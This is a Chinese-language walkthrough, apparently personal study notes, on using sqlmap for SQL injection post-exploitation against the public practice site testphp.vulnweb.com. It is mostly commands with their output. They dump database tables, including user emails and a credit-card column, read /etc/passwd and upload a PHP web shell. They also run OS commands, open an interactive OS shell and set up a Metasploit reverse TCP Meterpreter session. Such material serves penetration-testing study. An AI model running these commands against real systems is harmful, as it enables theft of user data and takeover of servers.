使用sqlmap檢測完後發現類似以下訊息,表示有漏洞
[INFO] Parameter: "id" of type "integer" is vulnerable to boolean-based blind injection.接著只要查看target.txt確認注入點,就可進行後滲透的工作,如下
/.local/share/sqlmap/output# cat testphp.vulnweb.com/target.txt
http://testphp.vulnweb.com/artists.php?artist=1 (GET)
/.local/share/sqlmap/output# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --privileg 取得基本信息
–current-db 查詢web目前使用的資料庫
–current-user 查詢web資料庫目前使用的帳號
–users 列出資料庫所有用戶
–privileg 檢視db權限
–passwords 列出資料庫用戶的hash密碼,並順便嘗試爆破取得明文
–schema 列出schema
–exclude-sysdbs 搭配schema一起用,列出所有非系統資料庫的schema
檢視db權限
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --privileg
...omit...
database management system users privileges:
[*] 'acuart'@'localhost' [1]:
privilege: USAGE查詢資料庫所在位置
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --sql-shell
sql-shell> select @@datadir
...omit...
select @@datadir: '/var/lib/mysql/'
...omit...查看非系統資料庫的schema
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --schema --exclude-sysdbs
...omit...
Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| cat_id | int |
| cdesc | tinytext |
| cname | varchar(50) |
+--------+-------------+
Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| a_id | int |
| cat_id | int |
| img | varchar(50) |
| pic_id | int |
| plong | text |
| price | int |
| pshort | mediumtext |
| title | varchar(100) |
+--------+--------------+
...omit...查看資料庫內容
–dbs 列出所有db名稱
–table 列出所有table名稱
–columns 列出所有欄位資料
-D 指定db, 若要指定多個, 則將db名稱以逗號分隔
-T 指定tables,若要指定多個, 則將table名稱以逗號分隔
-C 指定column,若要指定多個, 則將columns名稱以逗號分隔
–count 指定列出多少行資料
–dump 將所有資料輸出
–where 增加過濾條件
列出所有db名稱
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
...omit...
available databases [2]:
[*] acuart
[*] information_schema列出資料庫acuart的所有table名稱
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
...omit…
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+列出資料庫acuart中資料表users的筆數
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --count
...omit…
Database: acuart
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 10 |
+--------+---------+
...omit...列出資料庫acuart中資料表users的所有columns名稱
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns
...omit...
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+列出資料庫acuart中資料表users的email欄位資料,並輸出成csv
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C email --dump
...
Database: acuart
Table: users
[1 entry]
+-------------------------+
| email |
+-------------------------+
| polola@dino.querumaself |
+-------------------------+
[22:35:53] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'列出products資料表中,符合rewritename like ‘%camera%’的資料
# sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --batch -D acuart -T products --where="rewritename like '%camera%'" --dump
...omit...
[11:14:17] [INFO] fetching entries for table 'products' in database 'acuart'
Database: acuart
Table: products
[1 entry]
+----+-------+---------------------------+-------------------+---------------------------+
| id | price | name | rewritename | description |
+----+-------+---------------------------+-------------------+---------------------------+
| 2 | 10 | Web Camera A4Tech PK-335E | web-camera-a4tech | Web Camera A4Tech PK-335E |
+----+-------+---------------------------+-------------------+---------------------------+
...omit...
檔案系統控制
讀取文件
參數 –file-read
sqlmap -r sql.txt --file-read=/etc/passwd
sqlmap -r sql.txt --file-read="C:\boot.ini"
上傳文件
參數 –file-write 和–file-dest
sqlmap.py -r sql.txt --file-write=shell.php --file-dest=/var/www/html/shell.php
執行sql語法
一次一行: –sql-query
$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --sql-query="select * from users"進入sql shell: –sql-shell
$ sqlmap -r Downloads/ptsmsqli.request -sql-shell
...omit...
[07:39:14] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
ps:
–os-shell 功能在執行非查詢類型的 SQL 語句(如 UPDATE、INSERT、DELETE、DROP 等)需要資料庫支援stacked queries。如果資料庫不支援就無法執行這些非查詢語句
常見sql語法
select @@datadir查詢DB所在位置select @@servername查詢servernameselect @@hostname查詢hostnameSELECT LOAD_FILE('/etc/passwd')
refer
https://websec.ca/kb/sql_injection
執行系統命令
執行指定命令
參數: –os-cmd ,一次只能執行一個命令
執行ls命令 sqlmap -r sql.txt --os-cmd ls
執行id命令
# sqlmap -r sql.txt -p item --os-cmd id
...omit...
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually使用shell
模擬一個可以執行任意指令的 shell,就可以執行多個命令
參數: –os-shell
執行後會選擇程式語言與可寫入的位置
# sqlmap -r sql.txt --os-shell
...omit...
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4 # As my Target system web server supports PHP
...omit...
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
...omit...
[12:39:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 確認有可寫入的位置後就會上傳shell,並提供shell互動介面
使用第三方工具連線
參數: –os-pwn
# sqlmap -r sql.txt --os-pwn
...omit...
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
...omit...
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
...omit...
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search如果剛剛選 Metasploit就會出現以下選擇
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1 # Reverse TCP is a good choice for establishing a connection
what is the local address? [Enter for '192.168.1.101' (detected)] # No need to change LHost, LPort
which local port number do you want to use? [47984]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
...omit...
meterpreter >refer
http://iosec.in/sqlmap-4/
https://www.cybersecmastery.in/2022/12/operating-system-takeover-with-sqlmap.html
清除上次SQLmap的快取
方法1
刷新session文件
參數:–flush-session
如果不想用之前快取這個目標的session文件,可以使用這個參數。會清空之前的session,重新測試該目標。
方法2
忽略在會話文件中儲存的查詢結果
參數:–fresh-queries
方法3
直接刪除sqlmap output資料夾下的對應的目標目錄
位置通常在/home/kali/.local/share/sqlmap/output/<target>
該目錄下通常會有以下檔案:
- session.sqlite:sqlmap測試的結果都會保存在這個檔案裡
- log:sqlmap發現漏洞後下指令會做記錄
- target.txt:記錄原本sqlmap的檢測指令